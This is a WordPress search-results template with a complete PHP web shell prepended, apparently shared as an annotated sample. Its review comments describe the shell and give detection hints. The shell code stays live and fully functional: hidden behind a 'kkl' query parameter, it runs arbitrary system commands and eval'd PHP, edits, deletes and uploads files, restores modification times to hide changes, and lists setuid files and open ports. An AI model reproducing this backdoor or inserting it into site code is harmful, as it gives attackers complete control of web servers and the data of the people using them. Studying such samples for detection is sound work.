Created
January 17, 2013 18:15
<?php | |
// NOTE(review): everything from this gate down to the `die;` ahead of get_header() is a
// web-shell backdoor placed in front of a WordPress search template; it is not theme code.
// It runs only when the request carries a `kkl` query parameter. Without that parameter
// the condition is false and the template below renders as usual, so the page looks
// healthy in a browser. Requests to this template that carry `kkl` are the access-log
// indicator; the file itself should be replaced from a known-good copy of the theme.
if(isset($_GET['kkl'])) { | |
clearstatcache(); | |
// set_magic_quotes_runtime() was removed in PHP 7.0, so this sample targets older runtimes.
set_magic_quotes_runtime(0); | |
// Stub so the ini_set() calls below do not abort where that function is unavailable.
if(!function_exists('ini_set')){ | |
function ini_set(){ | |
return FALSE; | |
} | |
} | |
ini_set('output_buffering',0); | |
// Tries to lift the script time limit; $limit is only the label shown in the status panel.
if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited'; | |
else $limit = get_cfg_var('max_execution_time'); | |
// Aliases the pre-superglobal request arrays when $_SERVER is not set.
if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){ | |
$_POST = &$HTTP_POST_VARS; | |
$_GET = &$HTTP_GET_VARS; | |
$_SERVER = &$HTTP_SERVER_VARS; | |
} | |
// Undoes magic-quotes escaping so POST values reach the handlers below exactly as sent.
if(@get_magic_quotes_gpc()){ | |
foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); | |
foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v); | |
} | |
// Runs the command string $c through the first of exec(), shell_exec(), system() or
// passthru() that exists and returns the captured output; returns FALSE when none exists.
// Every call is prefixed with @, so a failure produces no PHP warning.
// NOTE(review): $c arrives unmodified from the POST fields `cmd` and `alias` further down,
// which makes this arbitrary command execution with the privileges of the PHP process.
// Listing these four functions in php.ini `disable_functions` is the usual hardening for
// this path; it does not cover the eval() handler further down.
function execute($c){ | |
if(function_exists('exec')){ | |
@exec($c, $out); | |
return @implode("\n", $out); | |
}elseif(function_exists('shell_exec')){ | |
$out = @shell_exec($c); | |
return $out; | |
}elseif(function_exists('system')){ | |
// system() prints directly, so its output is captured with an output buffer.
@ob_start(); | |
@system($c, $ret); | |
$out = @ob_get_contents(); | |
@ob_end_clean(); | |
return $out; | |
}elseif(function_exists('passthru')){ | |
// Same buffering approach as the system() branch.
@ob_start(); | |
@passthru($c, $ret); | |
$out = @ob_get_contents(); | |
@ob_end_clean(); | |
return $out; | |
}else{ | |
return FALSE; | |
} | |
} | |
// Returns the HTML-escaped contents of the file at path $f.
// Tries file() first. If that yields nothing (which includes an empty file) and the cURL
// extension is loaded, it requests the same path through a file:// URL and captures what
// curl_exec() prints. If neither works the result is the text 'Could not read file!'.
// NOTE(review): the second route is presumably there for hosts where file() is restricted.
// The scheme is assembled from two string pieces, so the literal "file://" never appears
// in the source; content signatures should not rely on that literal.
function read($f){ | |
$str = @file($f); | |
if($str){ | |
$out = implode('', $str); | |
}elseif(function_exists('curl_version')){ | |
@ob_start(); | |
$h = @curl_init('file:/'.'/'.$f); | |
@curl_exec($h); | |
$out = @ob_get_contents(); | |
@ob_end_clean(); | |
}else{ | |
$out = 'Could not read file!'; | |
} | |
return htmlspecialchars($out); | |
} | |
// Overwrites file $f with content $c and returns a status message.
// The file's modification time is read before the write and put back afterwards with
// touch(), so an edited file keeps its previous mtime.
// NOTE(review): because of this, "recently modified" searches based on mtime will miss
// files changed through this shell. Integrity checks should compare content hashes; on
// POSIX filesystems the inode change time (ctime) is not restored by touch().
function write($f, $c){ | |
// Captured before opening: fopen() in 'w' mode truncates the file and updates mtime.
$t = filemtime($f); | |
$fp = @fopen($f, 'w'); | |
if($fp){ | |
fwrite($fp, $c); | |
fclose($fp); | |
$out = 'File saved.'."\n"; | |
// Restores the saved mtime; skipped when filemtime() failed (e.g. $f did not exist yet).
if($t && touch($f, $t)){ | |
$out .= 'Last modification time changed.'; | |
}else{ | |
$out .= 'Could not change last modification time!'; | |
} | |
}else{ | |
$out = 'Saving failed!'; | |
} | |
return $out; | |
} | |
// Returns the size of file $f as a display string: bytes, Kb or Mb, rounded to two decimals.
// Sizes of 1073741824 bytes and above match no branch and come back as filesize()'s raw
// value with no unit.
function file_size($f){ | |
$size = filesize($f); | |
if($size < 1024) $size = $size.' b'; | |
elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb'; | |
elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb'; | |
return $size; | |
} | |
// Fallback definition used only where natcasesort() is missing.
// The parameter is taken by value and the function returns sort()'s boolean result, so
// with this fallback the caller's array stays unsorted.
if(!function_exists('natcasesort')){ | |
function natcasesort($arr){ | |
return sort($arr); | |
} | |
} | |
// Host reconnaissance: working directory, OS, account, PHP restrictions. The results feed
// the status panel printed further down.
// The working directory is switched to the POST field `dir` when present. The failure text
// stored in $out here is overwritten by the `$out = '';` reset below, so it is never shown.
if(!empty($_POST['dir'])){ | |
$dir = $_POST['dir']; | |
if(!@chdir($dir)) $out = 'chdir() failled!'; | |
} | |
$dir = getcwd(); | |
// A colon in the second character of the path (drive letter) is read as Windows.
(strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix'; | |
if(!$os_name = @php_uname()){ | |
if(function_exists('posix_uname')){ | |
$os_name = posix_uname(); | |
// NOTE(review): this is a comparison, not an assignment; it looks like a slip for `=`.
}elseif($os_name != getenv('OS')){ | |
$os_name = ''; | |
} | |
} | |
// Account the PHP process runs as, taken from the POSIX extension when available.
if(function_exists('posix_getpwuid')){ | |
$data = posix_getpwuid(posix_getuid()); | |
$user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')'; | |
}else{ | |
$user = ''; | |
} | |
$safe_mode = get_cfg_var('safe_mode'); | |
$safe_mode ? $safe = 'on' : $safe = 'off'; | |
// Probe: runs a harmless echo to learn whether command execution works on this host.
execute('echo ssps') ? $execute = 'on' : $execute = 'off'; | |
$server = getenv('SERVER_SOFTWARE'); | |
if(!$server) $server = '---'; | |
$out = ''; | |
$tail = ''; | |
$aliases = ''; | |
if(!$safe_mode){ | |
if($os_type == 'nix'){ | |
// $os is not initialised in the visible code and the panel below prints $os_name, not
// $os, so the output of these four sysctl calls is collected but never displayed.
$os .= execute('sysctl -n kern.ostype'); | |
$os .= execute('sysctl -n kern.osrelease'); | |
$os .= execute('sysctl -n kernel.ostype'); | |
$os .= execute('sysctl -n kernel.osrelease'); | |
if(empty($user)) $user = execute('id'); | |
// Canned commands offered in the "aliases" drop-down: setuid/setgid files, writable paths
// and listening ports. NOTE(review): the sysctl/id calls above and these find/netstat
// commands appear as child processes of the PHP or web-server process, which is unusual
// for a theme template and is what process-creation monitoring can alert on.
$aliases = array( | |
'' => '', | |
'find suid files'=>'find / -type f -perm -04000 -ls', | |
'find sgid files'=>'find / -type f -perm -02000 -ls', | |
'find all writable files in current dir'=>'find . -type f -perm -2 -ls', | |
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', | |
'find all writable directories and files in current dir'=>'find . -perm -2 -ls', | |
'show opened ports'=>'netstat -an | grep -i listen', | |
); | |
}else{ | |
// Windows branch: version string, account name, and a shorter alias list.
$os_name .= execute('ver'); | |
$user .= execute('echo %username%'); | |
$aliases = array( | |
'' => '', | |
'show runing services' => 'net start', | |
'show process list' => 'tasklist' | |
); | |
} | |
} | |
// Request dispatcher: the first non-empty POST field in this chain selects one action and
// its result text lands in $out. None of the inputs is validated.
// NOTE(review): the field names handled here (cmd, php, edit, save, efile, remove, newdir,
// newfile, alias, ufile, plus dir above) in a POST body sent to a search template are a
// useful match for WAF rules or request-body logging.
// `cmd`: operating-system command via execute().
if(!empty($_POST['cmd'])){ | |
$out = execute($_POST['cmd']); | |
} | |
// `php`: the submitted text is passed to eval(); whatever it prints is captured.
elseif(!empty($_POST['php'])){ | |
ob_start(); | |
eval($_POST['php']); | |
$out = ob_get_contents(); | |
ob_end_clean(); | |
} | |
// `edit`: loads a file into the result textarea. $tail adds hidden fields so the next
// submit goes to the `save` handler; $dir and $file are placed in the HTML unescaped.
elseif(!empty($_POST['edit'])){ | |
$file = $_POST['edit']; | |
$out = read($file); | |
$tail = '<input type=hidden name=dir value="'.$dir.'"><input type=hidden name=efile value="'.$file.'"><br><input type=submit>'; | |
} | |
// `save`: writes the textarea content to the path given in `efile` (see write()).
elseif(!empty($_POST['save'])){ | |
$out = write($_POST['efile'], $_POST['save']); | |
} | |
// `remove`: rmdir() for a directory, unlink() for anything else.
elseif(!empty($_POST['remove'])){ | |
$obj = $_POST['remove']; | |
@is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj); | |
$res ? $out = 'Removed successfully' : $out = 'Removing failed!'; | |
} | |
elseif(!empty($_POST['newdir'])){ | |
@mkdir($_POST['newdir']) ? $out = 'Directory created.' : $out = 'Could not create directory!'; | |
} | |
elseif(!empty($_POST['newfile'])){ | |
@touch($_POST['newfile']) ? $out = 'File created.' : $out = 'Could not create file!'; | |
} | |
// `alias`: the value is taken from the request and executed as sent; it is not checked
// against the $aliases list built above.
elseif(!empty($_POST['alias'])){ | |
$out = execute($_POST['alias']); | |
} | |
// `ufile`: copies an uploaded file into the current directory under the client-supplied
// name, with no extension or content check (chr(47) is '/').
elseif(!empty($_FILES['ufile']['tmp_name'])){ | |
if(!is_uploaded_file($_FILES['ufile']['tmp_name']) || @!copy($_FILES['ufile']['tmp_name'],$dir.chr(47).$_FILES['ufile']['name'])) $out = 'Could not upload file'; | |
else $out = 'Uploaded successfully.'; | |
} | |
// Prints the operator form as a series of heredocs. Every input posts back to the same
// URL, and the field names match the handlers in the dispatcher above.
print<<<here | |
<style> | |
table {font:9pt Tahoma;border-color:white} | |
input,select,file {background-color:#eeeeee} | |
textarea {background-color:#f2f2f2} | |
</style> | |
<br> | |
<center> | |
<table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver> | |
<tr> | |
<td> | |
<form method=post> | |
<table cellpadding=1 cellspacing=0 border=1 width=650> | |
here; | |
// The command row is only drawn when safe_mode is off. The `cmd` handler itself has no
// such check; only the form field is hidden.
if(!$safe_mode) print<<<here | |
<tr> | |
<td> | |
cmd | |
</td> | |
<td colspan=8> | |
<input type=text name=cmd size=97> | |
</td> | |
</tr> | |
here; | |
// Rows for the eval field and the file actions (edit, remove, new_dir, new_file).
print<<<here | |
<tr> | |
<td> | |
php | |
</td> | |
<td colspan=8> | |
<input type=text name=php size=97> | |
</td> | |
</tr> | |
<tr> | |
<td> | |
actions | |
</td> | |
<td> | |
edit | |
</td> | |
<td> | |
<input type=text name=edit size=14> | |
</td> | |
<td> | |
remove | |
</td> | |
<td> | |
<input type=text name=remove size=14> | |
</td> | |
<td> | |
new_dir | |
</td> | |
<td> | |
<input type=text name=newdir size=14> | |
</td> | |
<td> | |
new_file | |
</td> | |
<td> | |
<input type=text name=newfile size=15> | |
</td> | |
</tr> | |
here; | |
// Drop-down of the canned commands; $aliases stays an empty string under safe_mode, so
// the row is skipped there.
if($aliases){ | |
print<<<here | |
<tr> | |
<td> | |
aliases | |
</td> | |
<td colspan=8> | |
<select name=alias> | |
here; | |
foreach($aliases as $k => $v){ | |
print '<option value="'.$v.'">'.$k.'</option>'; | |
} | |
print<<<here | |
</select> | |
<input type=submit> | |
</td> | |
</tr> | |
here; | |
} | |
// Directory field, upload form and the status panel. $dir, $os_name, $user and $server
// are interpolated into the HTML without escaping.
print<<<here | |
<tr> | |
<td> | |
dir | |
</td> | |
<td colspan=8> | |
<input type=text value="{$dir}" name=dir size=97> | |
</td> | |
</tr> | |
</form> | |
<form method=post enctype=multipart/form-data> | |
<tr> | |
<td> | |
upload | |
</td> | |
<td colspan=8> | |
<input type=file name=ufile size=76> | |
<input type=hidden name=dir value="{$dir}"> | |
<input type=submit> | |
</td> | |
</tr> | |
</form> | |
</table> | |
<table cellpadding=0 cellspacing=0 border=1 width=650> | |
<form method=post> | |
<tr valign=top> | |
<td width=70% bgcolor=#dddddd> | |
<b>OS:</b> {$os_name}<br> | |
<b>User:</b> {$user}<br> | |
<b>Server:</b> {$server}<br> | |
<b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit} | |
</td> | |
<td rowspan=2 bgcolor=#dddddd> | |
<center>~:(expl0rer):~</center> | |
here; | |
// File browser panel: lists the current directory, directories first, colour-coded by
// access (red = writable, blue = readable, black = neither).
if($dp = @openDir($dir)){ | |
$cObj = readDir($dp); | |
// The loop ends at the first falsy entry name, which includes a name of "0".
while($cObj){ | |
if(@is_dir($cObj)) $theDirs[] = $cObj; | |
elseif(@is_file($cObj)) $theFiles[] = $cObj; | |
$cObj = readDir($dp); | |
} | |
closedir($dp); | |
} | |
if(!empty($theDirs)){ | |
natcasesort($theDirs); | |
if($os_type == 'nix'){ | |
foreach($theDirs as $cDir){ | |
$color='black'; | |
if(is_writeable($cDir)){ | |
$color='red'; | |
}elseif(is_readable($cDir)){ | |
$color='blue'; | |
} | |
print "<font color=".$color."><".$cDir."></font><br>"; | |
} | |
}else{ | |
foreach($theDirs as $cDir){ | |
// Windows branch tests writability by creating and deleting a marker file named
// `.ssps_tmp` in each listed directory.
// NOTE(review): that create/delete pair is visible to file-system auditing.
$tmp = $cDir.'/.ssps_tmp'; | |
if(@touch($tmp)){ | |
$color='red'; | |
unlink($tmp); | |
}elseif(opendir($cDir)){ | |
closedir(); | |
$color='blue'; | |
}else{ | |
$color='black'; | |
} | |
print "<font color=".$color."><".$cDir."></font><br>"; | |
} | |
} | |
// Shown whenever no directory entry was collected, whatever the actual cause.
} else print '<br>open_basedir restriction in effect. Allowed path is '.get_cfg_var('open_basedir'); | |
print '<br>'; | |
if(!empty($theFiles)){ | |
natcasesort($theFiles); | |
print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">'; | |
foreach($theFiles as $cFile){ | |
$size = file_size($cFile); | |
// Access is tested by really opening each file, append mode first and then read mode;
// nothing is written before the handle is closed.
if($fp = @fopen($cFile, 'a')) $color = 'red'; | |
elseif($fp = @fopen($cFile, 'r')) $color='blue'; | |
else $color = 'black'; | |
@fclose($fp); | |
print '<tr><td width=100%><font color='.$color.'>'.$cFile.'</font></td><td align=left>'.$size.'</tr>'; | |
} | |
print '</table>'; | |
} | |
// Result panel: $out from the dispatcher is written into the `save` textarea, followed by
// $tail (the hidden edit fields). Only read() escapes its output; results from the
// command and eval handlers are inserted as-is.
print<<<here | |
</td> | |
</tr> | |
<tr valign=top> | |
<td align=center> | |
<form method=post> | |
~:(results):~ | |
<textarea name=save cols=55 rows=15>{$out}</textarea> | |
{$tail} | |
</form> | |
</td> | |
</tr> | |
</table> | |
</form> | |
</td> | |
</tr> | |
</table> | |
here; | |
// Stops here so the theme template below is never rendered on a shell request; the
// response to a `kkl` request therefore contains only the shell page.
die; | |
} | |
?> | |
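<?php
/*
 * Search results template.
 *
 * Builds the post query from the theme's search form (GET fields
 * et_searchform_submit, et-inc-posts, et-inc-pages, et-month-choice, et-cat)
 * and renders the matching entries, or the "no results" partial.
 *
 * The request fields are attacker-controlled, so each one is checked for
 * presence and type before use. The original read et-month-choice and et-cat
 * without isset() and passed them on unmodified, which raised notices when
 * they were missing and let arrays or non-numeric text reach the query
 * arguments.
 */
$post_number = get_option('modest_searchnum_posts');
get_header();
include(TEMPLATEPATH . '/includes/top_info.php');
?>
<div id="left-area">
<?php
	// Kept as in the original: included partials share this scope and may read it.
	$i = 1;

	global $query_string;

	parse_str($query_string, $qstring_array);

	$args = array('showposts' => $post_number, 'paged' => $paged);

	if ( isset($_GET['et_searchform_submit']) ) {
		// Post types: posts by default, pages and/or posts when the boxes are ticked.
		$postTypes = array();
		if ( !isset($_GET['et-inc-posts']) && !isset($_GET['et-inc-pages']) ) $postTypes = array('post');
		if ( isset($_GET['et-inc-pages']) ) $postTypes = array('page');
		if ( isset($_GET['et-inc-posts']) ) $postTypes[] = 'post';
		$args['post_type'] = $postTypes;

		// Month filter: four-digit year followed by the month number. Anything
		// that is not a plain digit string of at least five characters is ignored.
		$month_choice = isset($_GET['et-month-choice']) ? $_GET['et-month-choice'] : 'no-choice';
		if ( is_string($month_choice) && $month_choice != 'no-choice' && ctype_digit($month_choice) && strlen($month_choice) > 4 ) {
			$et_year = (int) substr($month_choice, 0, 4);
			$et_month = (int) substr($month_choice, 4);
			$args['year'] = $et_year;
			$args['monthnum'] = $et_month;
		}

		// Category filter: forced to an integer; 0 (or an absent/array value) means "all".
		$et_cat = ( isset($_GET['et-cat']) && is_string($_GET['et-cat']) ) ? (int) $_GET['et-cat'] : 0;
		if ( $et_cat != 0 )
			$args['cat'] = $et_cat;
	}

	// Values parsed from $query_string take precedence over the ones set above.
	$args = array_merge($args, $qstring_array);

	query_posts($args);
?>
<?php if (have_posts()) : while (have_posts()) : the_post(); ?>
	<?php include(TEMPLATEPATH . '/includes/entry.php'); ?>
<?php endwhile; ?>
	<?php
		// Use the WP-PageNavi plugin when it is active, else the theme's own pager.
		if (function_exists('wp_pagenavi')) { wp_pagenavi(); }
		else { include(TEMPLATEPATH . '/includes/navigation.php'); }
	?>
<?php else : ?>
	<?php include(TEMPLATEPATH . '/includes/no-results.php'); ?>
<?php endif; wp_reset_query(); ?>
</div> <!-- end #left-area -->
<?php get_sidebar(); ?>
<?php get_footer(); ?>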